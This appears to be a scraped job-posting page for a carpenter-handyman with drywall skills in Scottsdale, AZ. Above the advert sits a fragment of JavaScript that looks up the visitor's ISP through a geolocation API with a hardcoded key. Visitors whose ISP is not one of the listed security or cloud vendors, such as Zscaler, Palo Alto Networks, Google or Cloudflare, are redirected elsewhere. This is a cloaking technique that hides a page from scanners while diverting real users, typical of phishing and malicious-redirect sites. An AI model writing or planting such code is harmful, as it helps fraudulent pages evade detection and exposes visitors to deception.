Carpenter Handyman Drywall
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a skilled Carpenter Handyman with drywall expertise to join our team in Scottsdale, AZ.
Responsibilities:
- Perform carpentry tasks including framing, finishing, and repairs
- Install, repair, and finish drywall surfaces
- Conduct minor electrical, plumbing, and painting as needed
- Assess project requirements and provide accurate estimates
- Ensure all work meets safety standards and quality expectations
- Maintain tools and work area in a clean, organized manner
Skills Needed:
- Proficiency in carpentry and drywall installation/repair
- Strong problem-solving and attention to detail
- Ability to read blueprints and technical drawings
- Good communication and teamwork skills
- Physical stamina and ability to lift heavy materials
Benefits:
- Competitive pay
- Health and dental insurance options
- Paid time off and holidays
- Opportunities for advancement and training